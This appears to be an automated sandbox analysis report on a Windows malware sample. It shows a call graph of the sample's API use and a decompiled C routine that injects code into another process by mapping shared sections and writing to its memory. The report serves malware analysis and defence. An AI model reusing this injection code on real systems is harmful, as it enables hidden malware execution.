GetVolumeInformationW 11593->11594 11595 4998baf 2 API calls 11594->11595 11596 499c678 11595->11596 11597 4999e51 2 API calls 11596->11597 11598 499c699 lstrcatW 11597->11598 11602 499a456 11598->11602 11601 499c6bf 11601->11505 11603 499a45e CharUpperBuffW 11602->11603 11603->11601 11605 49a3684 11604->11605 11606 49a36b7 lstrlenW 11605->11606 11607 49a36d4 _ftol2_sse 11606->11607 11607->11511 11610 4999672 11609->11610 11610->11610 11642 499d6fb 11641->11642 11672 4998bde RtlAllocateHeap 11642->11672 11644 499d796 11645 4999df2 2 API calls 11644->11645 11646 499d7f3 11644->11646 11647 4998baf 2 API calls 11644->11647 11648 49998bd RtlAllocateHeap 11644->11648 11645->11644 11646->11435 11649 499b557 11646->11649 11647->11644 11648->11644 11650 499b570 11649->11650 11673 499b4a6 11650->11673 11654 4998d6d memset 11653->11654 11655 499bc9a 11654->11655 11656 4998d6d memset 11655->11656 11657 499bca7 CreateProcessW 11656->11657 11657->11447 11682 499d218 11658->11682 11665 4998d6d memset 11666 499d99f GetThreadContext 11665->11666 11667 499d9c9 NtProtectVirtualMemory 11666->11667 11668 499da49 11666->11668 11667->11668 11669 499da0b NtWriteVirtualMemory 11667->11669 11729 499d38b 11668->11729 11669->11668 11670 499da28 NtProtectVirtualMemory 11669->11670 11670->11668 11671->11447 11672->11644 11674 49a351a 2 API calls 11673->11674 11675 499b4be 11674->11675 11676 4999dd8 2 API calls 11675->11676 11677 499b4e8 11676->11677 11678 4999e12 2 API calls 11677->11678 11679 499b546 11678->11679 11680 4998b9c 2 API calls 11679->11680 11681 499b551 11680->11681 11681->11447 11683 499d234 11682->11683 11684 499d246 11682->11684 11683->11684 11685 499d373 11683->11685 11686 4999df2 2 API calls 11684->11686 11685->11668 11708 499d447 11685->11708 11687 499d253 11686->11687 11688 4999e51 2 API calls 11687->11688 11689 499d28c 11688->11689 11690 4999df2 2 API calls 11689->11690 11691 499d2ab 11690->11691 11734 4999a5a 11691->11734 11694 4998baf 2 API calls 11695 499d2d3 11694->11695 11696 4999a5a 2 API calls 11695->11696 11697 499d2f6 LoadLibraryW 11696->11697 11699 499d321 11697->11699 11700 499d32f 11697->11700 11701 499f011 3 API calls 11699->11701 11702 4998bf4 2 API calls 11700->11702 11701->11700 11703 499d344 11702->11703 11704 4998d6d memset 11703->11704 11705 499d356 11704->11705 11705->11685 11706 4998bf4 2 API calls 11705->11706 11707 499d371 11706->11707 11707->11685 11709 499d47a 11708->11709 11710 499d49b NtCreateSection 11709->11710 11714 499d68e 11709->11714 11711 499d4c4 RegisterClassExA 11710->11711 11710->11714 11712 499d518 CreateWindowExA 11711->11712 11713 499d554 NtMapViewOfSection 11711->11713 11712->11713 11716 499d542 DestroyWindow UnregisterClassA 11712->11716 11713->11714 11721 499d587 NtMapViewOfSection 11713->11721 11715 499d6c3 11714->11715 11720 499d6bf NtUnmapViewOfSection 11714->11720 11717 499d6cc NtClose 11715->11717 11718 499d6d7 11715->11718 11716->11713 11717->11718 11718->11665 11718->11668 11720->11715 11721->11714 11722 499d5ab 11721->11722 11723 4998c43 RtlAllocateHeap 11722->11723 11724 499d5bb 11723->11724 11724->11714 11725 499d5ca VirtualAllocEx WriteProcessMemory 11724->11725 11726 4998bf4 2 API calls 11725->11726 11727 499d611 11726->11727 11728 499d674 lstrlenW 11727->11728 11728->11714 11730 499d3a2 11729->11730 11731 499d394 FreeLibrary 11729->11731 11732 499d3c3 11730->11732 11733 4998bf4 2 API calls 11730->11733 11731->11730 11732->11447 11733->11732 11735 4999a6c 11734->11735 11740 4998bde RtlAllocateHeap 11735->11740 11737 4999a8b 11738 4999aa8 11737->11738 11739 4999a97 lstrcatW 11737->11739 11738->11694 11739->11737 11740->11737 11829 499a633 11741->11829 11744 49a0c7b 11893 4998bde RtlAllocateHeap 11744->11893 11746 49a0c82 11747 49a0c8c 11746->11747 11894 499b3c7 11746->11894 11747->11452 11750 49a0cd0 11750->11452 11755 49a0a67 14 API calls 11756 49a0ccd 11755->11756 11756->11452 11931 4995ce2 11757->11931 11760 4996250 11760->11455 11761 4995edd 10 API calls 11762 4996267 11761->11762 11763 4996270 11762->11763 11934 499a9d6 11762->11934 11763->11455 11766 499627d lstrcmpiW 11766->11455 11767 4996295 11767->11455 11769 499b557 7 API calls 11768->11769 11770 4995ef6 11769->11770 11771 4995f03 11770->11771 11772 4999a07 2 API calls 11770->11772 11773 4995f26 11772->11773 11961 4995ed4 11773->11961 11775 4995f36 11776 4995f5a 11775->11776 11779 4995ed4 2 API calls 11775->11779 11777 4998bf4 2 API calls 11776->11777 11778 4995f66 11777->11778 11780 49960bf 11778->11780 11779->11776 11781 499a9d6 4 API calls 11780->11781 11782 49960c9 11781->11782 11783 49960d2 11782->11783 11784 49960d7 lstrcmpiW 11782->11784 11783->11461 11785 4996109 11784->11785 11786 49960ed 11784->11786 11787 4998bf4 2 API calls 11785->11787 11966 499aace 11786->11966 11787->11783 12015 4998bde RtlAllocateHeap 11791->12015 11793 499601e 11794 4996031 GetDriveTypeW 11793->11794 11795 4996062 11793->11795 11794->11795 12016 4992be4 11795->12016 11797 499607e 11798 499609c 11797->11798 12031 49953c7 11797->12031 12101 499afd6 11798->12101 11802 499afd6 2 API calls 11803 49960b8 11802->11803 11803->11459 11805 499109a 2 API calls 11804->11805 11806 49a0a76 11805->11806 12676 49966c7 memset 11806->12676 11809 4998baf 2 API calls 11810 49a0a9c 11809->11810 11813 49a0b15 11810->11813 12688 499a96c 11810->12688 11813->11461 11815 49a0ac7 11815->11813 11816 499109a 2 API calls 11815->11816 11817 49a0ad9 11816->11817 11818 4999e51 2 API calls 11817->11818 11819 49a0ae8 11818->11819 11820 499b5fb 2 API calls 11819->11820 11821 49a0afb 11820->11821 11822 49a0b09 11821->11822 12692 499add4 11821->12692 11824 4998bf4 2 API calls 11822->11824 11824->11813 11826 4996004 11825->11826 12705 4995c22 11826->12705 11868 4998bde RtlAllocateHeap 11829->11868 11831 499a65d 11832 4996126 11831->11832 11869 499c43a 11831->11869 11832->11451 11832->11452 11832->11744 11835 4999dd8 2 API calls 11836 499a69d 11835->11836 11837 499a7db 11836->11837 11841 499a6c9 11836->11841 11838 499a7ed 11837->11838 11839 499a82c 11837->11839 11842 4999a07 2 API calls 11838->11842 11863 499a7d7 11838->11863 11840 4999a07 2 API calls 11839->11840 11840->11863 11841->11863 11879 4999a07 11841->11879 11842->11863 11843 4998b9c 2 API calls 11846 499a84c 11843->11846 11845 4998bf4 2 API calls 11847 499a8e2 11845->11847 11846->11845 11858 499a8a7 11846->11858 11850 4998d6d memset 11847->11850 11848 499a791 11855 4999a07 2 API calls 11848->11855 11850->11858 11851 4999df2 2 API calls 11852 499a72f 11851->11852 11853 4999a5a 2 API calls 11852->11853 11856 499a741 11853->11856 11854 4998bf4 2 API calls 11854->11832 11857 499a7b8 11855->11857 11859 4998baf 2 API calls 11856->11859 11861 4998bf4 2 API calls 11857->11861 11858->11854 11858->11858 11860 499a74f 11859->11860 11885 4999930 11860->11885 11861->11863 11863->11843 11865 4998bf4 2 API calls 11866 499a786 11865->11866 11867 4998bf4 2 API calls 11866->11867 11867->11848 11868->11831 11870 499c453 11869->11870 11871 49a3674 2 API calls 11870->11871 11872 499c463 11871->11872 11873 4999dd8 2 API calls 11872->11873 11874 499c472 11873->11874 11875 499c4ae 11874->11875 11877 49a3674 2 API calls 11874->11877 11876 4998b9c 2 API calls 11875->11876 11878 499a67e 11876->11878 11877->11874 11878->11835 11881 4999a19 11879->11881 11891 4998bde RtlAllocateHeap 11881->11891 11882 4999a36 11883 4999a53 11882->11883 11884 4999a42 lstrcatA 11882->11884 11883->11846 11883->11848 11883->11851 11884->11882 11886 4999939 11885->11886 11887 4999966 11885->11887 11892 4998bde RtlAllocateHeap 11886->11892 11887->11865 11889 499994b 11889->11887 11890 4999953 MultiByteToWideChar 11889->11890 11890->11887 11891->11882 11892->11889 11893->11746 11895 499b3d8 11894->11895 11896 499b3df 11894->11896 11895->11750 11900 49a0b23 11895->11900 11896->11895 11897 499b409 11896->11897 11925 4998bde RtlAllocateHeap 11896->11925 11897->11895 11899 4998bf4 2 API calls 11897->11899 11899->11895 11926 4998bde RtlAllocateHeap 11900->11926 11902 49a0b36 11903 499109a 2 API calls 11902->11903 11905 49a0c28 11902->11905 11908 49a0c73 11902->11908 11904 49a0b6f 11903->11904 11907 4999df2 2 API calls 11904->11907 11906 4998bf4 2 API calls 11905->11906 11906->11908 11909 49a0b93 11907->11909 11921 499fba1 11908->11921 11910 4999a5a 2 API calls 11909->11910 11911 49a0bb1 11910->11911 11912 499b3c7 3 API calls 11911->11912 11913 49a0bbe 11912->11913 11914 4998baf 2 API calls 11913->11914 11915 49a0bca 11914->11915 11916 4998baf 2 API calls 11915->11916 11918 49a0bd3 11916->11918 11917 4998bf4 2 API calls 11919 49a0c1d 11917->11919 11918->11917 11920 4998bf4 2 API calls 11919->11920 11920->11905 11922 499fbc5 11921->11922 11927 49a0320 11922->11927 11924 499fbd7 11924->11755 11925->11897 11926->11902 11929 49a0339 11927->11929 11928 49a035a lstrlenW 11930 49a0379 11928->11930 11929->11928 11929->11929 11930->11924 11930->11930 11932 499b557 7 API calls 11931->11932 11933 4995cff 11932->11933 11933->11760 11933->11761 11935 499a9db 11934->11935 11938 499ab20 11935->11938 11939 499ab42 11938->11939 11952 499a5d3 11939->11952 11941 499ab4c 11946 4996279 11941->11946 11955 499cd27 11941->11955 11943 499ac19 11944 4998bf4 2 API calls 11943->11944 11944->11946 11945 499ab80 11945->11943 11947 49a0320 lstrlenW 11945->11947 11946->11766 11946->11767 11948 499abd1 11947->11948 11949 499abf4 11948->11949 11951 4998c43 RtlAllocateHeap 11948->11951 11950 4998bf4 2 API calls 11949->11950 11950->11943 11951->11949 11959 4998bde RtlAllocateHeap 11952->11959 11954 499a5df 11954->11941 11956 499cd4d 11955->11956 11958 499cd51 11956->11958 11960 4998bde RtlAllocateHeap 11956->11960 11958->11945 11959->11954 11960->11958 11962 499b0e4 11961->11962 11963 499b10a GetLastError 11962->11963 11964 499b115 GetLastError 11962->11964 11965 499b0ee 11962->11965 11963->11965 11964->11965 11965->11775 11982 499aadc 11966->11982 11969 499bfdb SetFileAttributesW 11970 4998d6d memset 11969->11970 11971 499c008 11970->11971 11972 499c029 11971->11972 11973 49a3674 2 API calls 11971->11973 11972->11785 11974 499c045 11973->11974 11975 4999e51 2 API calls 11974->11975 11976 499c056 11975->11976 11977 4999a5a 2 API calls 11976->11977 11978 499c067 11977->11978 11978->11972 12003 499bf08 11978->12003 11981 4998bf4 2 API calls 11981->11972 11983 499aaec 11982->11983 11986 499ac4b 11983->11986 11987 49960fe 11986->11987 11988 499ac68 11986->11988 11987->11785 11987->11969 11988->11987 11989 49a3674 2 API calls 11988->11989 11990 499acac 11989->11990 12002 4998bde RtlAllocateHeap 11990->12002 11992 499acc0 11992->11987 11993 49a351a 2 API calls 11992->11993 11994 499ad02 11993->11994 11995 49a0320 lstrlenW 11994->11995 11996 499ad43 11995->11996 11997 499a5d3 RtlAllocateHeap 11996->11997 12000 499ad4f 11997->12000 11998 499adb9 11999 4998bf4 2 API calls 11998->11999 11999->11987 12000->11998 12001 4998bf4 2 API calls 12000->12001 12001->11998 12002->11992 12004 499bf2b 12003->12004 12005 499bf33 memset 12004->12005 12014 499bfa2 12004->12014 12006 4999df2 2 API calls 12005->12006 12007 499bf4f 12006->12007 12008 49a3674 2 API calls 12007->12008 12009 499bf6b 12008->12009 12010 4999e51 2 API calls 12009->12010 12011 499bf81 12010->12011 12012 4998baf 2 API calls 12011->12012 12013 499bf8a MoveFileW 12012->12013 12013->12014 12014->11981 12015->11793 12017 4991080 2 API calls 12016->12017 12018 4992bfd 12017->12018 12109 499b1a4 12018->12109 12021 4998b9c 2 API calls 12022 4992c20 12021->12022 12023 4991080 2 API calls 12022->12023 12030 4992c53 12022->12030 12024 4992c2e 12023->12024 12119 499af9c 12024->12119 12027 4998b9c 2 API calls 12028 4992c47 12027->12028 12029 4998bf4 2 API calls 12028->12029 12029->12030 12030->11797 12227 499f14a 12031->12227 12036 499f05c 8 API calls 12037 4995401 12036->12037 12038 4999df2 2 API calls 12037->12038 12039 4995412 12038->12039 12040 4999a5a 2 API calls 12039->12040 12041 499542a 12040->12041 12042 4998baf 2 API calls 12041->12042 12044 499543d 12042->12044 12043 4995453 12046 4998bf4 2 API calls 12043->12046 12044->12043 12247 499afb9 12044->12247 12047 4995464 12046->12047 12253 49950b3 memset 12047->12253 12049 4995481 12050 4998d6d memset 12049->12050 12052 4995776 12049->12052 12051 49954bd 12050->12051 12313 499f326 12051->12313 12053 4999df2 2 API calls 12052->12053 12054 4995782 12053->12054 12056 4999a5a 2 API calls 12054->12056 12060 499579a 12056->12060 12057 49957ca 12060->12057 12064 4998bf4 2 API calls 12060->12064 12064->12057 12074 49955ff 12074->11798 12102 49960b0 12101->12102 12103 499afe5 12101->12103 12102->11802 12104 499b00a 12103->12104 12105 4998bf4 2 API calls 12103->12105 12106 4998bf4 2 API calls 12104->12106 12105->12103 12107 499b015 12106->12107 12108 4998bf4 2 API calls 12107->12108 12108->12102 12110 4999930 2 API calls 12109->12110 12111 499b1c4 12110->12111 12112 49a3674 2 API calls 12111->12112 12114 499b211 12111->12114 12113 499b1e3 FindResourceW 12112->12113 12113->12111 12113->12114 12115 4998bf4 2 API calls 12114->12115 12116 499b21c 12115->12116 12117 4998c43 RtlAllocateHeap 12116->12117 12118 4992c10 12116->12118 12117->12118 12118->12021 12124 4998f2e 12119->12124 12122 4992c3c 12122->12027 12125 4998f3d 12124->12125 12127 4998f79 12124->12127 12142 4998bde RtlAllocateHeap 12125->12142 12127->12122 12132 499aee1 12127->12132 12128 4998f47 12128->12127 12143 4998e33 12128->12143 12131 4998bf4 2 API calls 12131->12127 12186 49990ae 12132->12186 12136 499af95 12136->12122 12137 499af8d 12196 49992de 12137->12196 12139 499aefb 12139->12136 12139->12137 12140 4998c72 3 API calls 12139->12140 12192 4999880 12139->12192 12140->12139 12142->12128 12157 4998bde RtlAllocateHeap 12143->12157 12145 4998e48 12148 4998e70 12145->12148 12152 4998e55 12145->12152 12158 4999384 12145->12158 12146 4998ef4 12149 4998bf4 2 API calls 12146->12149 12146->12152 12148->12146 12150 4998ebe 12148->12150 12151 4999384 lstrlenW 12148->12151 12149->12152 12150->12146 12150->12152 12162 499fc3a 12150->12162 12151->12150 12152->12127 12152->12131 12155 4998f0e 12156 4998bf4 2 API calls 12155->12156 12156->12152 12157->12145 12159 49993a4 12158->12159 12160 49a0320 lstrlenW 12159->12160 12161 49993c8 12160->12161 12161->12148 12177 4998bde RtlAllocateHeap 12162->12177 12164 4998bf4 2 API calls 12166 499fdf3 12164->12166 12165 499fc5e 12174 499fdcd 12165->12174 12178 4998bde RtlAllocateHeap 12165->12178 12168 4998bf4 2 API calls 12166->12168 12170 499fe01 12168->12170 12169 499fc7e 12169->12174 12179 4998bde RtlAllocateHeap 12169->12179 12171 4998eed 12170->12171 12173 4998bf4 2 API calls 12170->12173 12171->12146 12171->12155 12173->12171 12174->12164 12175 499fc92 12175->12174 12180 4998c72 12175->12180 12177->12165 12178->12169 12179->12175 12185 4998bde RtlAllocateHeap 12180->12185 12182 4998caf 12182->12175 12183 4998c87 12183->12182 12184 4998bf4 2 API calls 12183->12184 12184->12182 12185->12183 12189 49990d1 12186->12189 12187 4998bde RtlAllocateHeap 12187->12189 12188 4999205 12191 4998bde RtlAllocateHeap 12188->12191 12189->12187 12189->12188 12190 4998bf4 2 API calls 12189->12190 12190->12189 12191->12139 12194 499988b 12192->12194 12195 49998a1 12192->12195 12208 4998bde RtlAllocateHeap 12194->12208 12195->12139 12198 49992ed 12196->12198 12207 4999375 12196->12207 12197 4999327 12199 4999337 12197->12199 12209 4999405 12197->12209 12198->12197 12200 4998bf4 2 API calls 12198->12200 12198->12207 12202 4998bf4 2 API calls 12199->12202 12204 4999352 12199->12204 12200->12198 12202->12204 12203 4999368 12205 4998bf4 2 API calls 12203->12205 12204->12203 12206 4998bf4 2 API calls 12204->12206 12205->12207 12206->12203 12207->12136 12208->12195 12221 4998bde RtlAllocateHeap 12209->12221 12211 4999448 12211->12199 12212 499943e 12212->12211 12213 4999471 12212->12213 12215 49994ef 12212->12215 12222 4998dbb 12213->12222 12216 49a0320 lstrlenW 12215->12216 12220 49994e7 12216->12220 12217 499947d 12218 49a0320 lstrlenW 12217->12218 12218->12220 12219 4998bf4 2 API calls 12219->12211 12220->12219 12221->12212 12223 49a3674 2 API calls 12222->12223 12224 4998dd4 12223->12224 12225 4998e01 12224->12225 12226 49a3674 2 API calls 12224->12226 12225->12217 12226->12224 12228 49953da 12227->12228 12229 499f160 12227->12229 12228->12074 12240 4995021 12228->12240 12230 4999dd8 2 API calls 12229->12230 12231 499f16c 12230->12231 12232 4999dd8 2 API calls 12231->12232 12233 499f17b 12232->12233 12233->12228 12234 499f188 GetModuleHandleA 12233->12234 12235 499f19c 12234->12235 12236 499f195 GetModuleHandleA 12234->12236 12237 4998b9c 2 API calls 12235->12237 12236->12235 12238 499f1a7 12237->12238 12239 4998b9c 2 API calls 12238->12239 12239->12228 12241 499c6ce 9 API calls 12240->12241 12242 4995031 12241->12242 12243 499b557 7 API calls 12242->12243 12244 499503c 12243->12244 12352 499b096 12244->12352 12246 4995047 12246->12036 12246->12074 12357 4998f8d 12247->12357 12249 499afc5 12250 499afcb 12249->12250 12251 499aee1 6 API calls 12249->12251 12250->12043 12252 499afd4 12251->12252 12252->12043 12255 49950ee 12253->12255 12254 4995123 12256 499c6ce 9 API calls 12254->12256 12286 4995188 12254->12286 12255->12254 12379 4993097 12255->12379 12258 4995133 12256->12258 12259 499c4c1 6 API calls 12258->12259 12260 4995143 12259->12260 12395 4995072 12260->12395 12286->12049 12566 499f236 12313->12566 12353 499b0aa 12352->12353 12354 499b0ba GetLastError 12353->12354 12355 499b0b0 GetLastError 12353->12355 12356 499b0c7 12354->12356 12355->12356 12356->12246 12377 4998bde RtlAllocateHeap 12357->12377 12359 4998fae 12360 4998fbf lstrcpynW 12359->12360 12375 4998fb8 12359->12375 12361 4999032 12360->12361 12362 4998fe2 12360->12362 12378 4998bde RtlAllocateHeap 12361->12378 12364 499b3c7 3 API calls 12362->12364 12366 4998fee 12364->12366 12365 499903d 12368 4998bf4 2 API calls 12365->12368 12372 4999057 12365->12372 12365->12375 12367 4998e33 4 API calls 12366->12367 12366->12372 12369 4999008 12367->12369 12368->12372 12369->12365 12373 499900e 12369->12373 12370 499907f 12371 4998bf4 2 API calls 12370->12371 12371->12375 12372->12370 12374 4998bf4 2 API calls 12372->12374 12376 4998bf4 2 API calls 12373->12376 12374->12370 12375->12249 12376->12375 12377->12359 12378->12365 12380 49930b3 12379->12380 12381 499109a 2 API calls 12380->12381 12394 499314b 12380->12394 12382 49930c6 12381->12382 12383 4999a5a 2 API calls 12382->12383 12384 49930d8 12383->12384 12385 4998baf 2 API calls 12384->12385 12386 49930e3 12385->12386 12387 499109a 2 API calls 12386->12387 12394->12254 12396 4999930 2 API calls 12395->12396 12397 499507d 12396->12397 12398 4999df2 2 API calls 12397->12398 12568 499f26a 12566->12568 12569 499f26e 12568->12569 12571 4998bde RtlAllocateHeap 12568->12571 12572 4994fa3 12568->12572 12571->12568 12698 4998bde RtlAllocateHeap 12676->12698 12678 4996702 12679 4996873 12678->12679 12699 4998bde RtlAllocateHeap 12678->12699 12679->11809 12681 4996782 12682 4998bf4 2 API calls 12681->12682 12683 4996865 12682->12683 12684 4998bf4 2 API calls 12683->12684 12684->12679 12685 4998d6d memset 12686 499671c 12685->12686 12686->12679 12686->12681 12686->12685 12687 499bfdb 11 API calls 12686->12687 12687->12686 12700 499a97b 12688->12700 12691 4998bde RtlAllocateHeap 12691->11815 12693 499ade0 12692->12693 12694 499a5d3 RtlAllocateHeap 12693->12694 12696 499ae08 12694->12696 12695 499ae6d 12695->11822 12696->12695 12697 4998bf4 2 API calls 12696->12697 12697->12695 12698->12678 12699->12686 12701 499ab20 4 API calls 12700->12701 12702 499a99a 12701->12702 12703 499a978 12702->12703 12704 4998bf4 2 API calls 12702->12704 12703->11813 12703->12691 12704->12703 12706 499a96c 4 API calls 12705->12706 12707 4995c2f 12706->12707 12740 4995c65 12707->12740 12741 499b297 12707->12741 12710 499aa65 6 API calls 12711 4995c55 12710->12711 12746 499f53a 12711->12746 12719 4995c7f 12774 49914f2 CreateMutexW 12719->12774 12721 4995c86 12789 49934cc 12721->12789 12740->11462 12742 499a065 GetSystemTimeAsFileTime 12741->12742 12743 499b2a2 12742->12743 12744 499aa36 6 API calls 12743->12744 12745 4995c43 12744->12745 12745->12710 12747 499f05c 8 API calls 12746->12747 12748 499f54c 12747->12748 12749 499f05c 8 API calls 12748->12749 12750 499f565 12749->12750 12848 499f4c9 12750->12848 12752 4995c5c 12753 4995baa 12752->12753 12754 499b557 7 API calls 12753->12754 12755 4995bc6 12754->12755 12755->12740 12756 499a108 12755->12756 12757 499a119 12756->12757 12758 4995c6f 12757->12758 12862 4998bde RtlAllocateHeap 12757->12862 12760 499a205 12758->12760 12762 499a223 12760->12762 12761 499a27b 12766 499a28c 12761->12766 12869 4998bde RtlAllocateHeap 12761->12869 12762->12761 12770 499a227 12762->12770 12863 499a15b 12762->12863 12764 499b096 2 API calls 12767 499a2f1 12764->12767 12766->12764 12766->12770 12768 499a32c 12767->12768 12769 499a367 SetThreadPriority 12767->12769 12771 499a350 12768->12771 12772 4998bf4 2 API calls 12768->12772 12769->12770 12770->12719 12773 4998d6d memset 12771->12773 12772->12771 12773->12770 12775 499150b CreateMutexW 12774->12775 12788 4991556 12774->12788 12776 499151d 12775->12776 12775->12788 12777 4991080 2 API calls 12776->12777 12778 4991525 12777->12778 12779 4999880 RtlAllocateHeap 12778->12779 12778->12788 12780 4991535 12779->12780 12781 4998b9c 2 API calls 12780->12781 12782 4991542 12781->12782 12870 4998bde RtlAllocateHeap 12782->12870 12784 499154c 12784->12788 12871 4998bde RtlAllocateHeap 12784->12871 12786 499156d 12786->12788 12872 49973f1 12786->12872 12788->12721 12790 499a205 6 API calls 12789->12790 12791 49934dc 12790->12791 12792 4993501 12791->12792 12793 499350f 12792->12793 12795 4993514 12792->12795 12876 499c987 12793->12876 12796 49936aa 12795->12796 12797 499d11f 8 API calls 12796->12797 12798 49936c5 12797->12798 12803 49936ce 12798->12803 12883 4998bde RtlAllocateHeap 12798->12883 12800 49936e2 12808 49936ec 12800->12808 12884 499cd02 12800->12884 12802 4998bf4 2 API calls 12802->12803 12809 4992e6b 12803->12809 12808->12802 12810 499a96c 4 API calls 12809->12810 12811 4992e81 12810->12811 12897 4992db5 12811->12897 12814 4992db5 3 API calls 12849 499f513 12848->12849 12850 499f4d7 12848->12850 12852 4999dd8 2 API calls 12849->12852 12861 4998bde RtlAllocateHeap 12850->12861 12854 499f51d 12852->12854 12853 499f4e8 12857 499f536 12853->12857 12859 4998bf4 2 API calls 12853->12859 12855 4999880 RtlAllocateHeap 12854->12855 12856 499f529 12855->12856 12858 4998b9c 2 API calls 12856->12858 12857->12752 12858->12857 12860 499f50c 12859->12860 12860->12752 12861->12853 12862->12758 12864 499a165 12863->12864 12865 4998bf4 2 API calls 12864->12865 12866 499a18a 12864->12866 12867 499a1a0 12864->12867 12865->12866 12868 4998d6d memset 12866->12868 12867->12762 12868->12867 12869->12766 12870->12784 12871->12786 12873 49973f6 12872->12873 12874 499f05c 8 API calls 12873->12874 12875 4997408 12874->12875 12875->12788 12877 499c99e 12876->12877 12878 4999df2 2 API calls 12877->12878 12882 499c9bd 12877->12882 12879 499c9cc lstrcmpiW 12878->12879 12880 499c9e2 12879->12880 12881 4998baf 2 API calls 12880->12881 12881->12882 12882->12795 12883->12800 12892 499cb77 12884->12892 12893 4998d6d memset 12892->12893 12895 499cbae 12893->12895 12898 4992dbf 12897->12898 12900 4992dd6 12897->12900 12899 4998c72 3 API calls 12898->12899 12899->12900 12900->12814 13041->11472 13042->11475

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 0499D447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                              			E0499D447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x49af81c; // 0x4bdfbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0499F0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x49af918; // 0x4bdf9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x49af818; // 0x4bdf8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x49ace44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x49af818; // 0x4bdf8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E04998C43( *0x49af81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E04998BF4( &_v36, 0x1ac4);
					_t119 =  *0x49af81c; // 0x4bdfbe8
					_t155 =  *0x49af830; // 0x4990000
					_v36 = _t119;
					 *0x49af830 = _v8;
					 *0x49af81c = _t163;
					E04998CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0499D3C6(_v16, _v8, _v44);
					_t124 = E0499A43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x49af830 = _t155;
						 *0x49af81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                                              0x0499d44d
                                                                                                                                                                                              0x0499d453
                                                                                                                                                                                              0x0499d455
                                                                                                                                                                                              0x0499d459
                                                                                                                                                                                              0x0499d45b
                                                                                                                                                                                              0x0499d45e
                                                                                                                                                                                              0x0499d461
                                                                                                                                                                                              0x0499d464
                                                                                                                                                                                              0x0499d467
                                                                                                                                                                                              0x0499d46a
                                                                                                                                                                                              0x0499d475
                                                                                                                                                                                              0x0499d478
                                                                                                                                                                                              0x0499d47f
                                                                                                                                                                                              0x0499d47f
                                                                                                                                                                                              0x0499d484
                                                                                                                                                                                              0x0499d487
                                                                                                                                                                                              0x0499d489
                                                                                                                                                                                              0x0499d48c
                                                                                                                                                                                              0x0499d495
                                                                                                                                                                                              0x0499d68e
                                                                                                                                                                                              0x0499d68e
                                                                                                                                                                                              0x0499d691
                                                                                                                                                                                              0x0499d694
                                                                                                                                                                                              0x0499d699
                                                                                                                                                                                              0x0499d69f
                                                                                                                                                                                              0x0499d6a2
                                                                                                                                                                                              0x0499d6a2
                                                                                                                                                                                              0x0499d6a5
                                                                                                                                                                                              0x0499d6a9
